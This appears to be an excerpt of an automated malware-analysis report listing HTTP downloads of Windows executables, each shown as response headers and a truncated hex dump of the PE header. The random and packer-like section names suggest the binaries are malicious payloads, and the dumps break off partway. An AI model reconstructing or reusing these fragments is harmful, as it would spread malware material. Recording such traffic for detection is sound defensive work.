                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 21 Nov 2024 11:11:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 21 Nov 2024 11:11:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 21 Nov 2024 11:11:13 GMTContent-Type: application/octet-streamContent-Length: 2811392Last-Modified: Thu, 21 Nov 2024 10:52:40 GMTConnection: keep-aliveETag: "673f10f8-2ae600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 8a f7 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 70 7a 70 63 70 6e 68 00 a0 2a 00 00 a0 00 00 00 86 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 68 76 63 6c 61 72 6d 00 20 00 00 00 40 2b 00 00 04 00 00 00 c0 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 c4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 21 Nov 2024 11:11:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 21 Nov 2024 11:11:20 GMTContent-Type: application/octet-streamContent-Length: 1889792Last-Modified: Thu, 21 Nov 2024 10:54:11 GMTConnection: keep-aliveETag: "673f1153-1cd600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4b 00 00 04 00 00 12 9c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c c6 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c c6 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 90 06 00 00 06 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 b0 06 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 62 64 72 70 79 77 6c 00 c0 19 00 00 10 31 00 00 b8 19 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 77 68 6a 61 70 63 63 00 10 00 00 00 d0 4a 00 00 04 00 00 00 b0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4a 00 00 22 00 00 00 b4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 21 Nov 2024 11:11:48 GMTContent-Type: application/octet-streamContent-Length: 2811392Last-Modified: Thu, 21 Nov 2024 10:52:40 GMTConnection: keep-aliveETag: "673f10f8-2ae600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 8a f7 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 70 7a 70 63 70 6e 68 00 a0 2a 00 00 a0 00 00 00 86 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 68 76 63 6c 61 72 6d 00 20 00 00 00 40 2b 00 00 04 00 00 00 c0 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 c4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 21 Nov 2024 11:12:03 GMTContent-Type: application/octet-streamContent-Length: 2811392Last-Modified: Thu, 21 Nov 2024 10:52:40 GMTConnection: keep-aliveETag: "673f10f8-2ae600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 8a f7 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 70 7a 70 63 70 6e 68 00 a0 2a 00 00 a0 00 00 00 86 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 68 76 63 6c 61 72 6d 00 20 00 00 00 40 2b 00 00 04 00 00 00 c0 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 c4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 21 Nov 2024 11:17:54 GMTContent-Type: application/octet-streamContent-Length: 2811392Last-Modified: Thu, 21 Nov 2024 10:52:40 GMTConnection: keep-aliveETag: "673f10f8-2ae600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 